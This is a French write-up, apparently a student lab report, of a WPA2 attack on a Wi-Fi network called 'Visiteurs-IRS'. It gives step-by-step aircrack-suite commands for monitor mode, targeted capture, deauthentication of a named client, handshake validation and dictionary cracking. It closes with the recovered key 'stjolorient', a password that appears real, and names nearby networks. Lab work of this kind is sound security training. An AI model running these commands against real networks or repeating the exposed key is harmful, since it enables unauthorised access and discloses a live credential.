# Kali outil utilisé

#### Cible identifiée

- **SSID** : `Visiteurs-IRS`
- **BSSID** : `70:F3:5A:27:95:30`
- **Canal** : 1
- **Chiffrement** : WPA2 CCMP PSK
- **Puissance** : -46 dBm (signal fort, proximité immédiate)
- **WPS** : activé (avec Fern)
- **Client connecté** : `2A:B7:E8:82:79:BE`

---

#### Phase 1 — Préparation de l'interface

```bash
airmon-ng check kill
airmon-ng start wlan0mon
iwconfig wlan0mon
```

Résultat : `wlan0mon` en **Mode Monitor**, fréquence 2.442 GHz (canal 6 par défaut, reconfiguré ensuite sur canal 1).

---

#### Phase 2 — Scan des réseaux

`airodump-ng` a détecté **235 AP** au total dans l'environnement (visible dans Fern). Le scan a permis d'identifier `Visiteurs-IRS` parmi d'autres réseaux présents (StJoCampus, StJoLaSalle, StJoProf, Freebox, SNIR\_cyber, MC…).

---

#### Phase 3 — Ciblage et capture du trafic

```bash
sudo airodump-ng -c 1 --bssid 70:F3:5A:27:95:30 -w capture_wifi wlan0mon
```

Fichier créé : `capture_wifi-02.cap` — 3061 paquets capturés. Le client `2A:B7:E8:82:79:BE` est visible avec 7449 frames et des trames **EAPOL** (échanges du handshake).

---

#### Phase 4 — Déauthentification

```bash
sudo aireplay-ng --deauth 10 -a 70:F3:5A:27:95:30 -c 2A:B7:E8:82:79:BE wlan0mon
```

10 paquets DeAuth dirigés envoyés au client `2A:B7:E8:82:79:BE` entre 09:00:26 et 09:00:31. Le client a été forcé à se reconnecter, déclenchant l'échange du handshake WPA2.

---

#### Phase 5 — Validation du handshake

<div aria-label="Code bash" class="relative group/copy bg-bg-000/50 border-0.5 border-border-400 rounded-lg focus:outline-none focus-visible:ring-2 focus-visible:ring-accent-100" id="bkmrk--5" role="group" tabindex="0"><div class="sticky opacity-0 group-hover/copy:opacity-100 group-focus-within/copy:opacity-100 top-2 py-2 h-12 w-0 float-right"><div class="absolute right-0 h-8 px-2 items-center inline-flex z-10"><div class="relative"><div class="transition-all opacity-100 scale-100" style="width: 20px; height: 20px; display: flex; align-items: center; justify-content: center;"><svg aria-hidden="true" class="transition-all opacity-100 scale-100" fill="currentColor" height="20" style="flex-shrink: 0;" viewbox="0 0 20 20" width="20" xmlns="http://www.w3.org/2000/svg"></svg>  
</div></div></div></div><div class="overflow-x-auto">  
</div></div>```bash
sudo aircrack-ng capture_wifi-02.cap
```

Résultat : **WPA (1 handshake)** confirmé pour `Visiteurs-IRS` / `70:F3:5A:27:95:30`. Le fichier `.cap` est valide et exploitable.

---

#### Phase 6 — Craquage du mot de passe

**Tentative 1 — rockyou.txt** (14 344 391 entrées) :

- Vitesse : 3230 k/s
- Temps estimé : 1h12 — mot de passe non trouvé dans rockyou (gros fichier avec 14 millions de mot de passe)

**Tentative 2 — wordlistperso.txt** (liste personnalisée) :

```bash
sudo aircrack-ng capture_wifi-02.cap -w /home/kali/Desktop/wordlistperso.txt
```

- 7/16 clés testées en moins d'une seconde
- **KEY FOUND! \[ stjolorient \]**